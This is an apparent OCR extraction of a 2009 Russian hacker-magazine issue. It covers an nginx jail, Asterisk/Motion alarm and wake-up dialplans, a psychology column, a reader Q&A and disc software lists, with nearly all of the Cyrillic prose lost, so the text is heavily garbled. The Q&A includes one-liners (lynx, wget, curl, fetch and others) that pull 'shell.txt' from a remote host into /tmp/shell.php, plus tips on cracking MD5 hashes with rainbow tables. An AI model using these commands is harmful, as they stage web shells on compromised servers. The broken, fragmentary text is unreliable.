, include mime.types; include /etc/nginx/mime.types;. ,
nginx ( -c ):
# jail /usr/jail/nginx nginx.jail 192.168.0.1 /sbin/nginx
-c /etc/nginx/nginx.conf

114

nginx , /etc/rc.conf
:
# vi /etc/rc.conf
ifconfig_ed0_alias0="inet 192.168.0.1"
jail_enable="YES"
jail_list="nginx"
jail_nginx_rootdir="/usr/jail/nginx"
jail_nginx_hostname="nginx.jail"
jail_nginx_ip="192.168.0.1"
// ,

jail_nginx_exec_start="/sbin/nginx -c /etc/nginx/nginx.
conf"
// nginx ,
jail
kill
jail_nginx_exec_stop=""
// devfs
jail_nginx_devfs_enable="YES"
jail_nginx_fdescfs_enable="NO"
jail_nginx_procfs_enable="NO"

, .
, ( ,
sshd, , ldd
, lsof). /dev.
,
, , devfs. /etc/defaults/
devfs.rules devfs jail. , /dev/
null /dev/random, . , /etc /etc/rc.conf :
jail__devfs_ruleset="devfsrules_jail"

, devfs.rules
, .
man- devfs(8) devfs.rules(5). z
X 04 /124/ 09

>> SYN/ACK

SERGEY JAREMCHUK

FEAT ANDREY MATVEEV

>> SYN/ACK

IP-PBX Asterisk
Asterisk IP-,
.
Asterisk ,
. , , .

Asterisk ( ) () . ,
:
1. Call- , .
2. API ( 5038)
telnet, .
3. CLI (command line interface)
( asterisk -r).
4. FollowMe.
.call. /var/spool/
asterisk/outgoing ( asterisk.conf astspooldir),
. Call- . Asterisk
; , , .
Call-. autoload=yes (
) modules.conf. extensions.conf,
. , ,
Asterisk
Motion (www.lavrsen.dk/twiki/bin/view/Motion/WebHome),
.
, , . Asterisk :
SIP- (X 04 /124/ 09

). Motion
/etc/motion/motion.conf ,
,
z 2008 . :
$ sudo nano /etc/motion/motion.conf
# -,
webcam_port 8000
webcam_motion on
webcam_localhost off
webcam_quality 30
webcam_maxrate 6
control_authentication username:password
# ,
, on_motion_detected
on_event_start
on_motion_detected /usr/bin/webcam_event.sh

, Motion 'n':
$ motion n
Thread is from /etc/motion/motion.conf

,
webcam_event.sh:
$ sudo nano /usr/bin/webcam_event.sh
#!/bin/sh
cat << EOF > /tmp/alarm.call
# CallerID

115

>> SYN/ACK

Channel: SIP/admin
Callerid: 11111111
# ,
(..
3 )
MaxRetries: 2
# ( 300 )
RetryTime: 30
# ( 45 )
WaitTime: 30
# extensions.conf
Context: alarm
Extension: s
Priority: 1
EOF
#

chown asterisk:asterisk /tmp/alarm.call
mv /tmp/alarm.call /var/spool/asterisk/outgoing/

, Call-. timestamp:
Set: timestamp=20091023104500

extension.conf:
$ sudo nano /etc/asterisk/extension.conf
[alarm]

116

exten
exten
exten
exten
exten

=>
=>
=>
=>
=>

s,1,Answer()
s,n,Wait(2)
s,n,Playback(activated)
s,n,Wait(1)
s,n,Hangup()

dialplan reload. , , Motion


webcam_event.sh, /tmp/alarm.call
/var/spool/asterisk/outgoing. Call- Asterisk, admin, sip.conf,
CallerID 11111111. , Asterisk , , e-mail
SMS. , Motion ,
.

, Asterisk,
. , Motion , .
cron,
/ . ,
Motion:
$ sudo nano /usr/bin/motion.sh
#!/bin/sh
case $1 in
X 04 /124/ 09

>> SYN/ACK

extensions.conf

start)
/usr/bin/motion
;;

, Asterisk

stop)
PID='pidof motion'
kill $PID
killall webcam_event.sh
rm
-f
/var/spool/asterisk/outgoing/
alarm.call
;;
esac

extension.conf , :
$ sudo nano /etc/asterisk/extension.conf
exten => *001,1,Answer()
exten => *001,n,Playback(activated)
exten
=>
*001,n,System(/usr/bin/motion.sh
start)
exten => *001,n,Hangup()
exten => *002,1,Answer()
exten
=>
*002,n,System(/usr/bin/motion.sh
stop)
exten => *002,n,Playback(de-activated)
exten => *002,n,Hangup()

, Motion,
*001, *002.

ASTERISK *nix
( ,
: sleep 20m && mpg123 ~/bell.mp3),
- .
asterisk wakeup , ,
. PHP-
wakeup.php, (www.
voip-info.org/liberty/view/file/2388).
tar-, php- AGI- (Asterisk Gateway Interface ,
Asterisk) : chmod
a+x /var/lib/asterisk/agi-bin/wakeup.php (
, astagidir
asterisk.conf).
wakeup.php , :
; PHP *nixX 04 /124/ 09


#!/usr/bin/php -q
; /tmp
$parm_error_log = '/var/log/asterisk/wakeup.log';
; /
tmp,
, wakeup.php , :
$parm_temp_dir = '/var/spool/asterisk/tmp';

Motion
extensions.conf :
exten => *97,1,Answer()
exten => *97,n,AGI(wakeup.php)
exten => *97,n,Hangup()

*97 , . , 17:55 (
:)), 0555,
2 (1 , 2 ).
,
php5-cli asterisk-sound-extra
fromdos, wakeup.php Unix-.


Asterisk asterisk-sounds
1000 ( Allison Smith). // ,
Audacity.

*98 /tmp myrecord.wav. ( #) , . :
, ,
//,
, VoIP-.

info



IVeS (

videocodec_nego_fix_
ast-1.4.13.patch.gz),

,

Digium.

video



Asterisk:
,
, .

exten => *98,1,Answer()


exten => *98,n,Wait(2)

117

>> .PRO
SYN/ACK

Asterisk: 1.4 1.6

exten
exten
exten
exten
exten

=>
=>
=>
=>
=>

*98,n,Record(/tmp/myrecord%d:wav)
*98,n,Wait(1)
*98,n,Playback(${RECORDED_FILE})
*98,n,Wait(1)
*98,n,Hangup()

/ Asterisk , privetstvie.wav. ,
gsm/mp3/ogg,
.


, .
, ,
. . Directory(), , ,
.
, ,

118

Motion

, :
exten => *99,1,Directory(default,internal)

voicemail.conf:
[default]
401 => 1234,Andrey Matveev,andrushock@real.xakep.ru

*99, , (
mat). Allison Smith voicemail.conf
: a-n-d-r-e-y m-a-t-v-e-e-v. 1. 401 (
exten => _XXX,1,SayDigits(${EXTEN})) .
!

? , : ,
100 . , X 04 /124/ 09

>>
>>SYN/ACK
.PRO
( )
?
SayUnixTime(), :
exten
exten
exten
exten

=>
=>
=>
=>

*100,1,Answer()
*100,n,SayUnixTime(,,QdhAR)
*100,n,WaitMusicOnHold(10)
*100,n,Goto(*100,1)

*100, Allison Smith ,


1 , , 14 50 .
10- (
directory
musiconhold.conf), ( , - ).


,
. , VoIP- Ekiga
, , allow=ilbc
allow=h264
. , Asterisk
allow=h261
1.4 (
, , , ..). , 384 /, , Asterisk, , - maxcallbitrate.
. , - , Asterisk TOS
ffmpeg, - (Type of Service) IP-, app_transcoder (sip.fontventa. , com/content/view/30/57), ffmpeg TOS . sip.conf , . tos_sip, tos_audio tos_video TOS-
1.6 SIP-, - .
, , tos_video=af41
( Asterisk),
.
iax.conf TOS
SIP IAX2. - :
(chan_h323, chan_oh323, chan_ooh323)
tos=0x18
H.323 ,
H.323 . ,
, - sip.conf :
-: Ekiga, Bria, X-lite, Linphone, Milliphone,
WengoPhone, Windows Messenger .
[general]
videosupport=yes

IAX , videosupport iax.conf .


, , :
H.261 ( ), H.263, H.263p H.264 (
Asterisk 1.4). Asterisk 1.4 , .
,
disallow=all. ,
.
disallow=all
allow=alaw
allow=gsm
allow=speex
X 04 /124/ 09


Asterisk? ,
,
( ,
), -,
, , , ( Asterisk + Festival),
, (,
, , VPN- , , ,
IP-
, , VoIP-). ,
- :). z

links



Asterisk
Asterisk
auto-dial out
www.voip-info.org/
wiki-Asterisk+autodial+out.

,
,
Asterisk-Video
(lists.digium.com/
pipermail/asteriskvideo).

119

>> units

/ LOZOVSKY@GAMELAND.RU /

PSYCHO:
(2009, VHSRIP)
][-
, ,
, ,
psycho .

,
. ( ) . , ,
- ,
,
( ).
, .
, .
, ,
,

.


, . :
/ ;
.
,
, . ,
,
, ,
.
! !
.
,
. ( ,
) (
, ,
, ).
,
, , , , ,

;
- ( ,
), ,
,
. -

120

, (, ,
) . ,
. !
: .
. .
,
( , ).
.
,
.
.
. .
, . -

:). , ,
, , ,
,
- (, , ).

. , , ,
. ,
( )
.


.
( ), . , ,
. ?
, , ,
? ,
,
(95%
). ( , ),
X 04 /124/ 09

>> units



10-
( .., ). 3- ? , !
1. .
2. , , .
3. ,
.
4. .
5.
.
6. , .

, (
;)).

. ( ,
, ).


, ,
. ,
,
,
. ,
,
, , !
( , -)
,
, . ?
, :
/
,
- , ,
X 04 /124/ 09

,
,

. , ,
.

,
( )

,
.
, ,
(
).

:)
.
?
: , , ,
- . , ,
. ,
.
, , ,
. ,
.
(, ?), , .
,
, ,
. , :).

z, SINteze, , ,
, ,
( ?)
.

. -

121

>> units

, :)

, . , ?
, (-,
, , ) .
, !
, , ?
. ,
, :
- , ,
, , . , .


, , , :). -
, , , ,
- ,
, , ,
-
. , ,
(
, , ..).

-, , ...,
,
, .

11- 1-

.. , . ,
. ,
.
. ,
, .
z ? ,

..
,
. , ,
. .
z ?

z ,

? , - ?

.. , ,
, - - (, ,
-, ).

.. ,
.
z ?

.. .
z , .

, ?

.. (
, . .). -
: , ,
(), ,
, , , / .
? , , ,

122

, -, , (, !), ,
(
). ,

( 90% ),
, :
, ,
(
; , ,
X 04 /124/ 09

>> units

( )
, ,

, ).
- .
, , .
, , , , (
), . ,
, , .
, , ,
,
4-8
. ? .
, . ,
... , . , , ,
?. ,
. ,
, ,
, (
. - ? ! ) ,
. . , . z

, , ,
( , , )
.
, ,
. , ,
, ,
? . .
,
.
( ) ,
(
).
X 04 /124/ 09

: . ,



. (
i), , , .
,
, , , 10 ,
3-5, .
, ()
(, ).
, ,
, ,
. , . -
, .
. , ,
, .
,
.
, , 2-3
.
.
. , ,
!
(-, !).
, . ,
(
). ,
, , . ,
.
. (love drug), , ,
. , - . , -
. .

.

123

>> units

/ ICQ 884888 /

FAQ UNITED:

Q: php- ( ) . ?
A:
, ,
, turnkeyhero.com/
replacer_tester.php spinnertool.com, . .
:
You Can Quickly And Easily Rewrite
Your Content And Drive More And
More Ultra-Responsive Targeted
Traffic To Your WebSite Even If
You Are A Newbie!
,
:
You Can Quickly And Colloquialism
Writing Your Accumulation And
Propulsion More And More UltraResponsive Targeted Assemblage To
Your WebSite Even If You Are A
Newbie!

124

,
?
Q: ?
A: WordPress-
,
RSS-, .
, blogspot.
com, wordpress.com ?
!
, e-mail,
RSS-,
www.rss2email.ru.
, ,
e-mail (
e-mail, ,
).
www.rss2email.ru
.
, , ,
:).

Yahoo Pipes (pipes.yahoo.com),
RSS-,

-, .
,
-: ,
,
,
.
(z#110).
Q: , ,
?
A: ! Start Run
ipconfig .
NAT, IP:
10.0.0.0 10.255.255.255
172.16.0.0 172.31.255.255
192.168.0.0 192.168.255.255
Q: n
?
A: , Lopa.

: My Computer Manage Local users and
groups Users
X 04 /124/ 09

>> units

Properties Sessions.
Never. Run
tscc.msc RDP :
net accounts /forcelogoff:no
net accounts /maxpwage:unlimited
Q: -
. ?
A: ,
LiveStreet (http://
livestreet.ru) (aka ort).
:
UTF-8


, , ,
, , ,



(ACL)
(
, ..)


-
-


e-mail
, ,
VKontakte.ru,
. API ,

userapi.com.
Q: ,
file_exists(). ?
A: ! .Slip (
!). ,
X 04 /124/ 09

, PHP 5.0.0, file_exists()


.
ftp://, php://memory, php://
temp, ssh2.sftp://.
true!
<?php
echo file_exists("ftp://user:pwd@
host/shell.txt");
?>
- .Slip:
http://forum.antichat.ru/thread99589.html.
Q: - psd.
css html?
.
A: - http://
www.psd2cssonline.com.
,
:
1. .
2. 8-
RGB (16- ).
3. .
4. Psd- 4 (8 ).
www.psd2cssonline.
com/node/9.
?
Upload your
PSD
!
Q: ,
( curl
wget)?
A: :
lynx: lynx -source "http://site.
com/shell.txt" > /tmp/shell.php
links: links -source "http://site.
com/shell.txt" > /tmp/shell.php
wget: wget -O /tmp/shell.php
http://site.com/shell.txt
GET: GET http://site.com/perl.txt
> /tmp/shell.php

fetch: fetch -o shell.php http://


site.com/shell.txt
curl: curl --output shell.php
http://site.com/shell.txt
Q: ! ?
A: Offline NT Password &
Registry Editor (home.eunet.no/~pnordahl/
ntpasswd).
:
,

Windows NT/2k/XP/
Vista


offline,

, CD

!
Q: md5-, , ,
.
?
A:
: http://rainbowtables.shmoo.com.
rainbow tables:
1. ;
2. +
;
3. + + .
( ) RainbowCrack 1.2 (http://www.antsight.
com/zsl/rainbowcrack).
rainbow
:
[ABCDEFGHIJKLMNOPQRSTUVWXYZ] 610
MB (8353082582 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
6789] 3 GB (80603140212 );

125

>> units

[ABCDEFGHIJKLMNOPQRSTUVWXYZ01234
56789!@#$%^&*()-_+= ] 24
GB (915358891407 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0
123456789!@#$%^&*()-_+=~'[]
{}|\:;"'<>,.?/ ] 64 GB
(7555858447479 );
[abcdefghijklmnopqrstuvwxyz012
3456789] 36 GB (2901713047668
).
Q: ICQ-
- AOL.
,
?
A:
ICQ 6.5 (
), .pin. :
1. http://ru.toonel.net
Windows- , Java
( 2.0 MB);
2. ;
3. , ,
127.0.0.1;
4. 127.0.0.1 .
. 8090 ;
;
5. ,
,
, https,
localhost, 8090 ( ,
).
DNS
;
6. .
P.S. &RQ
UIN #1,
QIP Miranda. (http://andrq.org).
Q: ! ,
! ?
A:
mstsc:
mstsc /admin (, Windows XP
SP3);
mstsc /console (, Windows
XP SP2 , , ).
, Run taskmgr, :).
P.S.

126

(
)
. :
.
Q: , Hyper-V Windows7.
A: ! :
1. Remote Admin Tools
Microsoft: technet.microsoft.com/en-us/
library/cc780654.aspx.
2. Control Panel
Programs and Features Turn
Windows features on or off.
3. Hyper-V
Remote Server Administration Tools Role
Administration Tools Hyper-V Tools.
Q: PowerShell ,
regedit?

.
A: , PowerShell ,
.REG-. HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\IniFileMapping\Autorun.inf
@=@SYS:DoesNotExist, (
).
,
.
function Disable-AutoRun
{
$item = Get-Item '
"REGISTRY::HKEY_LOCAL_
MACHINE\Software\Microsoft\
Windows NT\CurrentVersion\
IniFileMapping\AutoRun.inf" '
-ErrorAction
SilentlyContinue
if (-not $item) {
$item = New-Item
"REGISTRY::HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\
CurrentVersion\IniFileMapping\
AutoRun.inf"
}
Set-ItemProperty $item.PSPath
"(default)" "@SYS:DoesNotExist"
}

com), USB Monitor Professional (www.


hhdsoftware.com), USBSpy 2.0 (www.everstrike.
com/usb-monitor).
.

,
.
usbmon,
USB-.

, debugfs
insmod usbmon:
mount -t debugfs none_debugs /sys/
kernel/debug
modprobe usbmon
USB-
cat:
cat /sys/kernel/debug/usbmon/1u
ASCII ,
. , . Libpcap
usbmon, , , USB-
tcpdump.

Wireshark
(www.wireshark.org).
Q:
,
?
: .
1. Firefox IE
Tab (ietab.mozdev.org) Internet
Explorer OperaView (operaview.mozdev.org)
, Opera.
2. Lunascape,
-
Trident (Internet Explorer), Gecko (Mozilla
Firefox) WebKit (Safari, Google Chrome).
www.
lunascape.tv.
Q: .EXE .DLL
(.. , )?
A: Visual Studio:
link.exe /dump /headers <.exe>

Q: ,
USB. :

USB?
A: , : USBTrace (www.sysnucleus.

Microsoft
filever.exe (http://support.microsoft.com/
kb/913111), , , :
filever.exe <.exe>

z
X 04 /124/ 09

>Net
CCNA Network Visualizer 6.0
Cookienator 2.5.32
Google Chrome 2.0.172.0
HamachiSetup 1.0.3.0
Iconix

>Multimedia
AAA Logo 2009 3.0
CamSpace 8.1
IKEA Home Planner
iTunes 8.1
LastFM 1.06
LiberTV 1.4.0.0
Microsoft WorldWide Telescope
Random MixTape Maker 1.8.27.73
SumatraPDF 0.9.3
TrackMe
Tunatic 1.0.1b

>Misc
Eyeskeeper 2.0
f.lux
Jedi Concentrate
Jedi Window Dock
NiftyWindows 0.9.3.1
OpenWithView 1.02
Process Blocker 0.5b
TaggedFrog 0.8.1
Tudumo 1.1.1.25
UbitMenu
Workrave 1.9.0

>Games
PCSX2 0.9.6

>Development
CodeLobster PHP Edition 3.0
CollabNetSubversion 1.6.0-7
E-TextEditor 1.0.30
Intype Alpha 0.3.1.547
Titanium SDK 0.3
TortoiseSVN 1.6.0

>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns 9.40
DAEMON Tools Lite 4.30.3
Download Master 5.5.10.1163
FarPowerPack 1.15
FileZilla Client 3.2.3.1
K-Lite Mega Codec Pack 4.75
Miranda IM 0.7.17
Mozilla Firefox 3.0.8
Notepad++ 5.3.1
Opera 9.64
PuTTY 0.60
QIP Infium RC4 Build 9030
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
XnView 1.96

>>UNIX
>Desktop
2ManDVD 0.6.2
AcidRip 0.14
Archimedes 0.52.0
Avidemux 2.4.4
DigiKam 0.10
DVDStyler 1.7.2
Exaile 0.2.14
FBReader 0.10.5
Ffmpeg 0.5
Gnome 2.26
GPicView 0.1.11

>System
Avira AntiVir Personal 9
Bill2's Process Manager v3.3.0.1
Drive Backup 9.0 Express
FBackup 4.1
HD_Speed 1.5.3.64
KDE 0.9.5-0
MONyog MySQL Monitor and Advisor
3.0.4
MySQL 6.0 Alpha
Perfgraph 3.0
PortableApps.com Suite 1.5.2
RadarSync 2009
Revo Uninstaller 1.80
SQLyog 8.04

>Security
ExpanDrive 1.8.3
FileFuzz
Online Solutions Security Suite
0.8 Beta
Panda USB Vaccine 1.0.0.19
Swish 0.2.1.9
SysAnalyzer
Wireshark 1.0.6

Firefox:
CoolPreviews 2.7.2
DOM Inspector 2.0.3
Firebug 1.3.3
Flashblock 1.5.9
FoxyProxy 2.8.14
HackBar 1.3.2
NoScript 1.9.1.4
SQL Inject Me 0.4.0
Tamper Data 10.1.0
Torbutton 1.2.1
Web Developer 1.1.6
XSS Me 0.4.0

IE7Pro 2.4.5
Internet Explorer 8.0
Lunascape 5 RC1
Mikogo
Opera Turbo alpha
qutIM 0.2a
RDP Manager
The Favorite Start Page 1.77
TightVNC 1.3.10
X-Lite 3.0
Yoics for Windows 2.6.086

>Net
Amsn 0.97.2
bareFTP 0.2.1
Ekiga 3.2.0
Gajim 0.12.1
LFTP 3.7.11
Mozilla Firefox 3.0.8
Mozilla Thunderbird 2
Opera 9.64
Opera Turbo 10.0.4166 Alpha
Pidgin 2.5.5
Psi 0.12
QuickSynergy 0.9.0
qutIM 0.2 alpha
Smuxi 0.6.3
Synapse IM
Synergy 1.3.1
Tightvnc 1.3.10

>Games
Neverball 1.5.0
OpenArena 0.7.1

>Devel
Adventure PHP Framework 1.8
Anjuta IDE 2.26
bashdb 4.0.0.2
DDD 3.3.12
EiffelStudio 6.3
IntellijIDEA 8.1
MonoDevelop 1.9.3
Nasm 2.06rc8
Pango 1.24.0
Parrot 1.0
QDevelop 0.27.4
Qt 4.5.0
Qt Creator 1.0
RapidSVN 0.9.8
Ruby 1.9.1
Subversion 1.6.0
Titanium
Ruby - Aptana Studio 1.2.5
Ruby - Arcadia 0.6.0
Ruby - FreeRIDE 0.9.6
Ruby - IronRuby 0.3
Ruby - JRuby 1.2.0
Ruby - korundum 3.5.5
Ruby - qt4-qtruby 2.0.3
Ruby - Rails 2.3.2
Ruby - RubyGems 1.3.1
Ruby - wxRuby2 2.0.0

Intipunku 0.4
Jajuk 1.7.1
Medusa4 3.1.1
Octave 3.0.3
OpenOffice.org 3.0.1
PeaZip 2.5.1
Perl Audio Converter 4.0.5
Picasa 3.0 beta
sK1 0.9.0
SongBird 1.1.1
Sound Juicer 2.26.0
Xneur 0.9.3
Xvidcap 1.1.7

>X-distr
BackTrack 4 beta
Damn Vulnerable Linux 1.5
nUbuntu 8.12
STD 0.1

>System
Apcupsd 3.14.5
ATI Radeon Linux Display Drivers 9.2
Cobbler 1.4.3
Foremost 1.5.5
LDAP Account Manager 2.5.0
Lynis 1.2.4
NVClock 0.8
nVidia Linux Display Driver x86
180.29
PCSX2 0.9.6
Photorec 6.10
Qemu 0.10.1
rovclock 0.6e

>Server
Apache 2.2.11
ASSP 1.4.3.1
Asterisk 1.6.0.6
Bacula 2.4.4
DBMail 2.3.5
djbdns 1.05
Dnstop 2009.01.28
Dovecot 1.2 beta4
Icecast 2.3.2
MediaTomb 0.11
Mongoose 2.4
PostgreSQL 8.3.7
Postoffice 1.4.10
TFTP Server 1.6
Unbound 1.2.1
VideoLAN Server 0.5.6
Vino 2.26.0

>Security
Automated Password Generator
2.2.3
ClamAV 0.95
Epicwebhoneypot 1.0c
Fail2ban 0.8.3
Ferm 2.0.5
GnuPG 2.0.11
iodine 0.5.1
ITS4 Security Scanner 4-1.1.1
m0n0wall 1.3b15
Nmap 4.76
OpenVAS 2.0
RogueScanner 2.6.0.0
SILC 1.1
Snare 1.5.0
Strongswan 4.2.13
UnHash 1.0
Unhide
Wireshark 1.0.6

Tkabber 0.11.1

04(124) 2009

Sony rootkit

Slammer

Loveletter

. 26

GPS

Sasser

PC27 adaptor

Melissa

. 4


WWW.GAMER-CITY.RU

04 (124) 2009

. 52

Warezov

. 20

Storm

Nimda

. 88


TWITTER

PYTHONE

10

Mebroot

1999-2009

. 32

PC27

J3

Code red

w w w.xakep.ru

WORDPRESS

http://

WWW2
2

SCREENTOASTER
WWW.SCREENTOASTER.COM

! ,
,
, , , , ! ScreenToaster (Linux,
Windows, Mac) , , , .
? SWF,
, !

QUAKE3

QUAKE LIVE
WWW.QUAKELIVE.COM

- , Quake3 Pentium 3d- 2 FPS. :)


? iD Software, , ,
, - !
, IE
Firefox. ,
, , ..
Q3 . , : Quake Live
-.

AUDIOTAG.INFO
WWW.AUDIOTAG.INFO

: ? -
AudioTag, ,
, . ,
10-40 . AudioTag.info
.
-. : .

128

MICROSOFT LIVE SYNC


WWW.FOLDERSHARE.COM
- email,
, , ,
, : ! Foldershare,
Micrsoft,
. ,
:
Live Sync !

X 04 /124/ 09

Оценить